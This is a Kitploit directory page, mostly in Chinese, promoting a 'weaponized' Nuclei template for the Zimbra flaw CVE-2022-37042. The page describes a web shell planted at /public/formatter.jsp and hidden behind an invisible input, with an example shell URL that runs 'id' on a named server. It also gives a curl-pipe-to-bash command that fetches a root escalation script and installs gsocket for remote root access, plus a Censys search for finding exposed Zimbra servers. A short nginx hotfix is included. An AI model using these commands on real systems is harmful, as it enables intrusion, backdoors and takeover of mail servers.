Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-37042 — Zimbra CVE-2022-37042 Nuclei weaponized template | Kitploit
工具/GitHubGitHub/aels/cve-2022-37042
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubaels/cve-2022-37042

CVE-2022-37042

Zimbra CVE-2022-37042 Nuclei weaponized template

查看仓库
18113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-37042

image

Zimbra CVE-2022-37042 Nuclei 武器化模板

shell 路径:/public/formatter.jsp

Nuclei 本身:https://github.com/projectdiscovery/nuclei

shell 包含一个透明度为 0 的隐藏输入框,因此只需将鼠标悬停在其上,输入命令,然后按 [Enter] 键:

image

示例 shell URL:

root@kitploit:~
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id

CVE-2022-37042 热修复补丁,用于修补已被攻陷的服务器

执行以下命令(仅一次):

root@kitploit:~
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

对于不使用 Nginx 而是 Apache 的服务器,需要额外的代码。欢迎提交 Pull requests。

通过 zimbslap 实现 Zimbra 自动提权至 root

root@kitploit:~
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

此命令将安装 global-socket (https://www.gsocket.io/deploy/) 并向你返回用于以 root 身份连接的密钥。

获取 Zimbra 服务器 IP

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22

祝你们生日快乐,混蛋们 ;)

下载工具